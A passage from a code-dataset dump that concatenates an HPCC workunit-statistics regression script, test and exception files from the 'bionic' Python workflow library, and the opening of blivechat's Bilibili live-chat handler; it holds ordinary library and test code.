scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeScope='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeId='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeRawValue='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeMeasure='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeCreator='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeCreatorType='0')
),
TestCase(
scopeFilter(MaxDepth='2', Scopes={'Scope':'w1:graph1:sg1'}),
nestedFilter(Depth=0),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2', Scopes={'Scope':'w1:graph1:sg1'}),
nestedFilter(Depth=1),
propertiesToReturn(Properties={'Property':['WhenStarted','WhenCreated']}, ExtraProperties={'Extra':{'scopeType':'edge','Properties':{'Property':['NumStarts','NumStops']}}}),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumRowsProcessed','MinValue':'10000','MaxValue':'20000'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumIndexSeeks','MaxValue':'3'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumIndexSeeks','ExactValue':'4'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':[{'Name':'NumIndexSeeks','ExactValue':'4'},{'Name':'NumAllocations','MinValue':'5','MaxValue':'10'}]}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(ScopeTypes={'ScopeType':'workflow'}, MaxDepth='999',),
nestedFilter(Depth='0'),
propertiesToReturn(AllAttributes='1', Properties=[{'Property':'IdDependencyList'}]),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(ScopeTypes={'ScopeType':'workflow'}, MaxDepth='999',),
nestedFilter(Depth='0'),
propertiesToReturn(Properties=[{'Property':'IdDependency'}]),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
]
logging.info('Gathering workunits')
wu = wutest.getTestWorkunits(requiredJobs)
logging.info('Matched job count: %d', wutest.getMatchedJobCount())
if (wutest.getMatchedJobCount()==0):
logging.error('There are no matching jobs. Has the regression suite been executed?')
logging.error('Aborting')
exit(1)
missingjobs = wutest.getMissingJobCount(requiredJobs)
if (missingjobs > 0):
logging.warning('There are %d missing jobs. Full regression will not be executed', missingjobs)
logging.info('Executing regression test cases')
stats = wucommon.Statistics()
for jobname, wuid in wu.items():
logging.debug('Job %s (WUID %s)', jobname, wuid)
if (jobname == 'sort_thor'):
for index, t in enumerate(TestCases):
tcasename = 'testcase' + str(index+1)
success = execTestCase(jobname, wuid, t, tcasename)
stats.addCount(success)
elif (jobname in ['sets_thor','sets_roxie', 'sets_hthor']):
success = execTestCase(jobname, wuid, TestCases[30], 'testcase31')
stats.addCount(success)
success = execTestCase(jobname, wuid, TestCases[31], 'testcase32')
stats.addCount(success)
else:
success = execTestCase(jobname, wuid, TestCases[0], 'testcase1')
stats.addCount(success)
logging.info('Success count: %d', stats.successCount)
logging.info('Failure count: %d', stats.failureCount)
```
|
{
"source": "jecorona97/bionic",
"score": 2
}
|
#### File: bionic/bionic/exception.py
```python
class UndefinedEntityError(KeyError):
@classmethod
def for_name(cls, name):
return cls("Entity %r is not defined" % name)
class AlreadyDefinedEntityError(ValueError):
@classmethod
def for_name(cls, name):
return cls("Entity %r is already defined" % name)
class IncompatibleEntityError(ValueError):
pass
class UnsupportedSerializedValueError(Exception):
pass
class CodeVersioningError(Exception):
pass
```
#### File: bionic/tests/conftest.py
```python
import pytest
import bionic as bn
# We provide this at the top level because we want everyone using FlowBuilder
# to use a temporary directory rather than the default one.
@pytest.fixture(scope='function')
def builder(tmp_path):
builder = bn.FlowBuilder('test')
builder.set(
'core__persistent_cache__flow_dir', str(tmp_path / 'BNTESTDATA'))
return builder
# These three functions add a --slow command line option to enable slow tests.
# Seems involved, but it's the approach recommended in the pytest docs.
def pytest_addoption(parser):
parser.addoption(
'--slow', action='store_true', default=False, help='run slow tests'
)
def pytest_configure(config):
config.addinivalue_line('markers', 'slow: mark test as slow to run')
def pytest_collection_modifyitems(config, items):
if config.getoption('--slow'):
# If the option is present, don't skip slow tests.
return
skip_slow = pytest.mark.skip(reason='only runs when --slow is set')
for item in items:
if 'slow' in item.keywords:
item.add_marker(skip_slow)
```
#### File: tests/test_flow/test_api.py
```python
import pytest
from pytest import raises
import pandas as pd
import bionic as bn
from bionic.exception import (
UndefinedEntityError, AlreadyDefinedEntityError, IncompatibleEntityError)
from ..helpers import count_calls
@pytest.fixture(scope='function')
def preset_builder(builder):
builder.declare('x')
builder.assign('y', 1)
builder.assign('z', values=[2, 3])
@builder
def f(x, y):
return x + y
@builder
def g(y, z):
return y + z
builder.declare('p')
builder.declare('q')
builder.add_case('p', 4, 'q', 5)
@builder
@bn.outputs('y_plus', 'y_plus_plus')
def y_pluses(y):
return (y + 1), (y + 2)
return builder
@pytest.fixture(scope='function')
def preset_flow(preset_builder):
return preset_builder.build()
# -- Builder API tests.
def test_declare(preset_builder):
builder = preset_builder
builder.declare('w')
builder.set('w', 7)
assert builder.build().get('w') == 7
with raises(AlreadyDefinedEntityError):
builder.declare('x')
with raises(AlreadyDefinedEntityError):
builder.declare('y')
with raises(AlreadyDefinedEntityError):
builder.declare('z')
def test_declare_protocol(builder):
protocol = bn.protocol.dillable()
builder.declare('n', protocol=protocol)
assert builder.build().entity_protocol('n') == protocol
def test_set(preset_builder):
builder = preset_builder
builder.set('x', 5)
assert builder.build().get('x') == 5
builder.set('y', 6)
assert builder.build().get('y') == 6
builder.set('z', 7)
assert builder.build().get('z') == 7
builder.set('f', 8)
assert builder.build().get('f') == 8
with pytest.raises(UndefinedEntityError):
builder.set('xxx', 9)
def test_set_multiple(preset_builder):
builder = preset_builder
builder.set('x', values=[5, 6])
assert builder.build().get('x', set) == {5, 6}
builder.set('y', values=[6, 7])
assert builder.build().get('y', set) == {6, 7}
builder.set('z', values=[7, 8])
assert builder.build().get('z', set) == {7, 8}
builder.set('f', values=[8, 9])
assert builder.build().get('f', set) == {8, 9}
def test_assign_single(preset_builder):
builder = preset_builder
builder.assign('w', 7)
assert builder.build().get('w') == 7
with raises(AlreadyDefinedEntityError):
builder.assign('x', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('y', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('z', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('f', 7)
def test_assign_multiple(preset_builder):
builder = preset_builder
builder.assign('w', values=[1, 2])
assert builder.build().get('w', set) == {1, 2}
with raises(AlreadyDefinedEntityError):
builder.assign('x', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('y', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('z', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('f', values=[1, 2])
def test_add_case(preset_builder):
builder = preset_builder
builder.add_case('x', 7)
assert builder.build().get('x', set) == {7}
builder.add_case('x', 8)
assert builder.build().get('x', set) == {7, 8}
builder.add_case('y', 7)
assert builder.build().get('y', set) == {1, 7}
builder.add_case('z', 7)
assert builder.build().get('z', set) == {2, 3, 7}
with raises(ValueError):
builder.add_case('f', 7)
with raises(UndefinedEntityError):
builder.add_case('xxx', 7)
builder.add_case('p', 4, 'q', 6)
builder.add_case('p', 5, 'q', 6)
assert builder.build().get('p', set) == {4, 5}
assert builder.build().get('q', set) == {5, 6}
with raises(ValueError):
builder.add_case('p', 7)
with raises(ValueError):
builder.add_case('p', 4, 'q', 6)
builder.declare('r')
with raises(ValueError):
builder.add_case('p', 1, 'q', 2, 'r', 3)
with raises(IncompatibleEntityError):
builder.add_case('y_plus', 2)
with raises(IncompatibleEntityError):
builder.add_case('y_plus', 2, 'y_plus_plus', 3)
def test_then_set(preset_builder):
builder = preset_builder
builder.declare('a')
builder.declare('b')
builder.declare('c')
builder.add_case('a', 1, 'b', 2).then_set('c', 3)
builder.add_case('a', 4, 'b', 5).then_set('c', 6)
assert builder.build().get('a', set) == {1, 4}
assert builder.build().get('b', set) == {2, 5}
assert builder.build().get('c', set) == {3, 6}
builder.declare('d')
case = builder.add_case('d', 1)
with raises(ValueError):
case.then_set('c', 1)
with raises(ValueError):
case.then_set('a', 1)
with raises(UndefinedEntityError):
case.then_set('xxx', 1)
def test_clear_cases(preset_builder):
builder = preset_builder
builder.clear_cases('x')
builder.set('x', 7)
assert builder.build().get('x') == 7
builder.clear_cases('x')
builder.set('x', values=[1, 2])
assert builder.build().get('x', set) == {1, 2}
builder.clear_cases('y')
builder.set('y', 8)
assert builder.build().get('y') == 8
builder.clear_cases('y')
builder.set('z', 9)
assert builder.build().get('z') == 9
builder.clear_cases('f')
builder.set('f', 10)
assert builder.build().get('f') == 10
with raises(IncompatibleEntityError):
builder.clear_cases('p')
builder.clear_cases('p', 'q')
with raises(IncompatibleEntityError):
builder.clear_cases('y_plus')
builder.clear_cases('y_plus', 'y_plus_plus')
def test_delete(preset_builder):
builder = preset_builder
builder.delete('g')
with raises(UndefinedEntityError):
builder.build().get('g')
builder.assign('g', 1)
builder.build().get('g', set) == {1}
builder.delete('z')
with raises(UndefinedEntityError):
builder.build().get('z', set)
builder.delete('y')
with raises(UndefinedEntityError):
# This fails because f has been invalidated.
builder.build()
def test_call(builder):
builder.assign('a', 1)
builder.assign('b', 2)
@builder
def h(a, b):
return a + b
assert builder.build().get('h') == 3
builder.delete('a')
with raises(UndefinedEntityError):
builder.build().get('h')
def test_merge(builder):
# This is just a basic test; there's a more thorough test suite in
# test_merge.py.
builder.assign('a', 1)
builder.declare('b')
@builder
def h(a, b):
return a + b
builder2 = bn.FlowBuilder('flow2')
builder2.assign('b', 2)
builder.merge(builder2.build())
assert builder.build().get('h') == 3
builder3 = bn.FlowBuilder('flow3')
builder3.declare('a')
builder3.declare('b')
@builder3 # noqa: F811
def h(a, b):
return a * b
builder.merge(builder3.build(), keep='new')
# Notice: we correctly find the new value for `h`, rather than the cached
# version.
assert builder.build().get('h') == 2
# --- Flow API tests.
def test_get_single(preset_flow):
flow = preset_flow
with raises(ValueError):
flow.get('x')
assert flow.get('y') == 1
with raises(ValueError):
assert flow.get('z')
with raises(ValueError):
assert flow.get('f')
assert flow.get('p') == 4
assert flow.get('q') == 5
assert flow.get('y_plus') == 2
assert flow.get('y_plus_plus') == 3
with raises(UndefinedEntityError):
assert flow.get('xxx')
def test_get_multiple(preset_flow):
flow = preset_flow
assert flow.get('x', set) == set()
assert flow.get('y', set) == {1}
assert flow.get('z', set) == {2, 3}
assert flow.get('f', set) == set()
assert flow.get('g', set) == {3, 4}
assert flow.get('p', set) == {4}
assert flow.get('q', set) == {5}
def test_get_formats(preset_flow):
flow = preset_flow
for fmt in [list, 'list']:
ys = flow.get('y', fmt)
assert ys == [1]
zs = flow.get('z', fmt)
assert zs == [2, 3] or zs == [3, 2]
ps = flow.get('p', fmt)
assert ps == [4]
for fmt in [set, 'set']:
assert flow.get('y', fmt) == {1}
assert flow.get('z', fmt) == {2, 3}
assert flow.get('p', fmt) == {4}
for fmt in [pd.Series, 'series']:
y_series = flow.get('y', fmt)
assert list(y_series) == [1]
assert y_series.name == 'y'
z_series = flow.get('z', fmt).sort_values()
assert list(z_series) == [2, 3]
assert z_series.name == 'z'
# This is a convoluted way of accessing the index, but I don't want
# the test to be sensitive to whether we output a regular index or a
# MultiIndex.
z_series_index_df = z_series.index.to_frame()\
.applymap(lambda x: x.get())
assert list(z_series_index_df.columns) == ['z']
assert list(z_series_index_df['z']) == [2, 3]
p_series = flow.get('p', fmt)
assert list(p_series) == [4]
assert p_series.name == 'p'
p_series_index_df = p_series.index.to_frame()\
.applymap(lambda x: x.get())
assert list(sorted(p_series_index_df.columns)) == ['p', 'q']
assert list(p_series_index_df['p']) == [4]
assert list(p_series_index_df['q']) == [5]
def test_assigning(preset_flow):
flow = preset_flow
assert flow.assigning('a', 2).get('a') == 2
assert flow.assigning('a', values=[3, 4]).get('a', set) == {3, 4}
with raises(AlreadyDefinedEntityError):
flow.assigning('x', 1)
def test_setting(preset_flow):
flow = preset_flow
assert flow.get('y') == 1
assert flow.setting('y', 2).get('y') == 2
assert flow.setting('y', values=[3, 4]).get('y', set) == {3, 4}
with raises(UndefinedEntityError):
flow.setting('xxx', 1)
assert flow.get('y') == 1
def test_declaring(preset_flow):
flow = preset_flow
assert flow.declaring('a').setting('a', 1).get('a') == 1
with raises(AlreadyDefinedEntityError):
flow.assigning('x', 1)
def test_merging(preset_flow):
flow = preset_flow
new_flow = (
bn.FlowBuilder('new_flow').build()
.assigning('x', 5)
.assigning('y', 6)
)
assert flow.get('f', set) == set()
with pytest.raises(AlreadyDefinedEntityError):
assert flow.merging(new_flow)
assert flow.merging(new_flow, keep='old').get('f') == 6
assert flow.merging(new_flow, keep='new').get('f') == 11
def test_adding_case(preset_flow):
flow = preset_flow
assert flow.get('x', set) == set()
assert flow.adding_case('x', 1).get('x', set) == {1}
assert flow.get('p', set) == {4}
assert flow.adding_case('p', 4, 'q', 6).get('q', set) == {5, 6}
assert flow\
.adding_case('p', 4, 'q', 6)\
.adding_case('p', 4, 'q', 7)\
.get('q', set) == {5, 6, 7}
with raises(ValueError):
flow.adding_case('p', 3)
assert flow.get('x', set) == set()
assert flow.get('p', set) == {4}
assert flow.get('q', set) == {5}
def test_then_setting(builder):
builder.declare('a')
builder.declare('b')
builder.declare('c')
flow0 = builder.build()
flow1 = flow0\
.adding_case('a', 1, 'b', 2)\
.then_setting('c', 3)\
flow2 = flow1\
.adding_case('a', 4, 'b', 5)\
.then_setting('c', 6)\
assert flow0.get('a', set) == set()
assert flow0.get('b', set) == set()
assert flow0.get('c', set) == set()
assert flow1.get('a', set) == {1}
assert flow1.get('b', set) == {2}
assert flow1.get('c', set) == {3}
assert flow2.get('a', set) == {1, 4}
assert flow2.get('b', set) == {2, 5}
assert flow2.get('c', set) == {3, 6}
assert flow0.get('a', set) == set()
assert flow0.get('b', set) == set()
assert flow0.get('c', set) == set()
def test_then_setting_too_soon(builder):
builder.declare('c')
flow = builder.build()
with raises(ValueError):
flow.then_setting('c', 1)
def test_clearing_cases(preset_flow):
flow = preset_flow
assert flow.get('z', set) == {2, 3}
assert flow.clearing_cases('z').get('z', set) == set()
assert flow.clearing_cases('z').setting('z', 1).get('z') == 1
def test_all_entity_names(preset_flow):
assert set(preset_flow.all_entity_names()) == {
'x', 'y', 'z', 'f', 'g', 'p', 'q', 'y_plus', 'y_plus_plus'
}
def test_in_memory_caching(builder):
builder.assign('x', 2)
builder.assign('y', 3)
@builder
@bn.persist(False)
@count_calls
def xy(x, y):
return x * y
flow = builder.build()
assert flow.get('xy') == 6
assert xy.times_called() == 1
assert flow.get('xy') == 6
assert xy.times_called() == 0
flow = builder.build()
assert flow.get('xy') == 6
assert xy.times_called() == 1
new_flow = flow.setting('y', values=[4, 5])
assert new_flow.get('xy', set) == {8, 10}
assert xy.times_called() == 2
assert new_flow.get('xy', set) == {8, 10}
assert xy.times_called() == 0
assert flow.get('xy') == 6
assert xy.times_called() == 0
def test_to_builder(builder):
builder.assign('x', 1)
flow = builder.build()
assert flow.get('x') == 1
new_builder = flow.to_builder()
new_builder.set('x', 2)
new_flow = new_builder.build()
assert new_flow.get('x') == 2
assert flow.get('x') == 1
assert builder.build().get('x') == 1
def test_shortcuts(builder):
builder.assign('x', 1)
flow = builder.build()
assert flow.get.x() == 1
assert flow.setting.x(3).get.x() == 3
def test_unhashable_index_values(builder):
builder.assign('xs', values=[[1, 2], [2, 3]])
@builder
def xs_sum(xs):
return sum(xs)
sums_series = builder.build().get('xs_sum', 'series').sort_values()
assert list(sums_series) == [3, 5]
index_items = [wrapper.get() for wrapper, in sums_series.index]
assert index_items == [[1, 2], [2, 3]]
```
#### File: tests/test_flow/test_persistence_gcs.py
```python
import pytest
import random
import subprocess
import getpass
import shutil
import six
import dask.dataframe as dd
from ..helpers import (
ResettingCounter, skip_unless_gcs, GCS_TEST_BUCKET, df_from_csv_str,
equal_frame_and_index_content)
from bionic.exception import CodeVersioningError
import bionic as bn
# This is detected by pytest and applied to all the tests in this module.
pytestmark = skip_unless_gcs
def gsutil_wipe_path(url):
assert 'BNTESTDATA' in url
subprocess.check_call(['gsutil', '-q', '-m', 'rm', '-rf', url])
def gsutil_path_exists(url):
return subprocess.call(['gsutil', 'ls', url]) == 0
def local_wipe_path(path_str):
assert 'BNTESTDATA' in path_str
shutil.rmtree(path_str)
@pytest.fixture(scope='module')
def bucket_name():
return GCS_TEST_BUCKET
@pytest.fixture(scope='function')
def tmp_object_path(bucket_name):
random_hex_str = '%016x' % random.randint(0, 2 ** 64)
path_str = '%s/BNTESTDATA/%s' % (getpass.getuser(), random_hex_str)
gs_url = 'gs://%s/%s' % (bucket_name, path_str)
# This emits a stderr warning because the URL doesn't exist. That's
# annoying but I wasn't able to find a straightforward way to avoid it.
assert not gsutil_path_exists(gs_url)
yield path_str
gsutil_wipe_path(gs_url)
@pytest.fixture(scope='function')
def gcs_builder(builder, bucket_name, tmp_object_path):
builder = builder.build().to_builder()
builder.set('core__persistent_cache__gcs__bucket_name', bucket_name)
builder.set('core__persistent_cache__gcs__object_path', tmp_object_path)
builder.set('core__persistent_cache__gcs__enabled', True)
builder.set('core__versioning_mode', 'assist')
return builder
# This should really be multiple separate tests, but it's expensive to do the
# setup, teardown, and client initialization, so we'll just do it all in one
# place.
def test_gcs_caching(gcs_builder):
# Setup.
call_counter = ResettingCounter()
builder = gcs_builder
builder.assign('x', 2)
builder.assign('y', 3)
@builder
def xy(x, y):
call_counter.mark()
return x * y
# Test reading from and writing to GCS cache.
flow = builder.build()
local_cache_path_str = flow.get('core__persistent_cache__flow_dir')
gcs_cache_url = flow.get('core__persistent_cache__gcs__url')
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 2
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
gsutil_wipe_path(gcs_cache_url)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
gsutil_wipe_path(gcs_cache_url)
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 2
# Test versioning.
@builder # noqa: F811
def xy(x, y):
call_counter.mark()
return y * x
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy')
local_wipe_path(local_cache_path_str)
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy')
@builder # noqa: F811
@bn.version(minor=1)
def xy(x, y):
call_counter.mark()
return y * x
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 6
assert flow.setting('x', 4).get('xy') == 12
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=1)
def xy(x, y):
call_counter.mark()
return x ** y
flow = builder.build()
assert flow.get('xy') == 8
assert flow.setting('x', 4).get('xy') == 64
assert call_counter.times_called() == 2
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert flow.get('xy') == 8
assert flow.setting('x', 4).get('xy') == 64
assert call_counter.times_called() == 0
# Test indirect versioning.
@builder
def xy_plus(xy):
return xy + 1
flow = builder.build()
assert flow.get('xy_plus') == 9
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=1)
def xy(x, y):
call_counter.mark()
return int(float(x)) ** y
flow = builder.build()
with pytest.raises(CodeVersioningError):
flow.get('xy_plus')
@builder # noqa: F811
@bn.version(major=1, minor=1)
def xy(x, y):
call_counter.mark()
return int(float(y)) ** x
flow = builder.build()
assert flow.get('xy_plus') == 9
assert call_counter.times_called() == 0
@builder # noqa: F811
@bn.version(major=2)
def xy(x, y):
call_counter.mark()
return y ** x
flow = builder.build()
assert flow.get('xy_plus') == 10
assert call_counter.times_called() == 1
# Dask only works in Python 3.
if six.PY3:
# Test multi-file serialization.
dask_df = dd.from_pandas(
df_from_csv_str(
'''
color,number
red,1
blue,2
green,3
'''),
npartitions=1)
@builder
@bn.protocol.dask
def df():
call_counter.mark()
return dask_df
flow = builder.build()
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert call_counter.times_called() == 1
local_wipe_path(local_cache_path_str)
flow = builder.build()
assert equal_frame_and_index_content(
flow.get('df').compute(), dask_df.compute())
assert call_counter.times_called() == 0
```
#### File: bionic/tests/test_util.py
```python
import pytest
from .helpers import equal_when_sorted
import bionic.util as util
def test_group_pairs():
from bionic.util import group_pairs
assert group_pairs([]) == []
assert group_pairs([1, 2]) == [(1, 2)]
assert group_pairs([1, 2, 3, 4, 5, 6]) == [(1, 2), (3, 4), (5, 6)]
with pytest.raises(ValueError):
group_pairs([1])
with pytest.raises(ValueError):
group_pairs([1, 2, 3])
def test_immutable_sequence():
class Seq(util.ImmutableSequence):
def __init__(self, items):
super(Seq, self).__init__(items)
seq = Seq([1, 2, 3])
assert seq[0] == 1
assert seq[2] == 3
assert seq[-2] == 2
assert list(seq) == [1, 2, 3]
assert len(seq) == 3
assert 1 in seq
assert 4 not in seq
assert {seq: 7}[seq] == 7
assert seq == Seq([1, 2, 3])
assert seq != Seq([1, 3, 2])
assert seq != [1, 2, 3]
assert seq < Seq([1, 3, 2])
assert seq <= Seq([1, 3, 2])
assert Seq([1, 3, 2]) > seq
assert Seq([1, 3, 2]) >= seq
def test_immutable_mapping():
class Mapping(util.ImmutableMapping):
def __init__(self, values_by_key):
super(Mapping, self).__init__(values_by_key)
mapping = Mapping({'a': 1, 'b': 2})
assert mapping['a'] == 1
assert mapping['b'] == 2
with pytest.raises(KeyError):
mapping['c']
assert mapping.get('a') == 1
assert mapping.get('c') is None
assert {mapping: 7}[mapping] == 7
assert equal_when_sorted(list(mapping), ['a', 'b'])
assert dict(mapping) == {'a': 1, 'b': 2}
assert equal_when_sorted(list(mapping.keys()), ['a', 'b'])
assert equal_when_sorted(list(mapping.values()), [1, 2])
assert equal_when_sorted(list(mapping.items()), [('a', 1), ('b', 2)])
assert equal_when_sorted(list(mapping.keys()), ['a', 'b'])
assert equal_when_sorted(list(mapping.values()), [1, 2])
assert equal_when_sorted(list(mapping.items()), [('a', 1), ('b', 2)])
assert mapping == Mapping({'a': 1, 'b': 2})
assert mapping != {'a': 1, 'b': 2}
assert mapping != Mapping({'b': 1, 'a': 2})
assert mapping < Mapping({'b': 1, 'a': 2})
assert mapping <= Mapping({'b': 1, 'a': 2})
assert Mapping({'b': 1, 'a': 2}) > mapping
assert Mapping({'b': 1, 'a': 2}) >= mapping
```
|
{
"source": "Jecosine/blivechat",
"score": 2
}
|
#### File: blivechat/api/chat.py
```python
import asyncio
import enum
import json
import logging
import random
import time
import uuid
from typing import *
import aiohttp
import tornado.websocket
import api.base
import blivedm.blivedm as blivedm
import config
import models.avatar
import models.translate
import models.log
logger = logging.getLogger(__name__)
class Command(enum.IntEnum):
HEARTBEAT = 0
JOIN_ROOM = 1
ADD_TEXT = 2
ADD_GIFT = 3
ADD_MEMBER = 4
ADD_SUPER_CHAT = 5
DEL_SUPER_CHAT = 6
UPDATE_TRANSLATION = 7
_http_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))
room_manager: Optional['RoomManager'] = None
def init():
global room_manager
room_manager = RoomManager()
class Room(blivedm.BLiveClient):
HEARTBEAT_INTERVAL = 10
# 重新定义parse_XXX是为了减少对字段名的依赖,防止B站改字段名
def __parse_danmaku(self, command):
info = command['info']
if info[3]:
room_id = info[3][3]
medal_level = info[3][0]
else:
room_id = medal_level = 0
return self._on_receive_danmaku(blivedm.DanmakuMessage(
None, None, None, info[0][4], None, None, info[0][9], None,
info[1],
info[2][0], info[2][1], info[2][2], None, None, info[2][5], info[2][6], None,
medal_level, None, None, room_id, None, None,
info[4][0], None, None,
None, None,
info[7]
))
def __parse_gift(self, command):
data = command['data']
return self._on_receive_gift(blivedm.GiftMessage(
data['giftName'], data['num'], data['uname'], data['face'], None,
data['uid'], data['timestamp'], None, None,
None, None, None, data['coin_type'], data['total_coin']
))
def __parse_buy_guard(self, command):
data = command['data']
return self._on_buy_guard(blivedm.GuardBuyMessage(
data['uid'], data['username'], data['guard_level'], None, None,
None, None, data['start_time'], None
))
def __parse_super_chat(self, command):
data = command['data']
return self._on_super_chat(blivedm.SuperChatMessage(
data['price'], data['message'], None, data['start_time'],
None, None, data['id'], None,
None, data['uid'], data['user_info']['uname'],
data['user_info']['face'], None,
None, None,
None, None, None,
None
))
_COMMAND_HANDLERS = {
**blivedm.BLiveClient._COMMAND_HANDLERS,
'DANMU_MSG': __parse_danmaku,
'SEND_GIFT': __parse_gift,
'GUARD_BUY': __parse_buy_guard,
'SUPER_CHAT_MESSAGE': __parse_super_chat
}
def __init__(self, room_id):
super().__init__(room_id, session=_http_session, heartbeat_interval=self.HEARTBEAT_INTERVAL)
self.clients: List['ChatHandler'] = []
self.auto_translate_count = 0
async def init_room(self):
await super().init_room()
return True
def stop_and_close(self):
if self.is_running:
future = self.stop()
future.add_done_callback(lambda _future: asyncio.ensure_future(self.close()))
else:
asyncio.ensure_future(self.close())
def send_message(self, cmd, data):
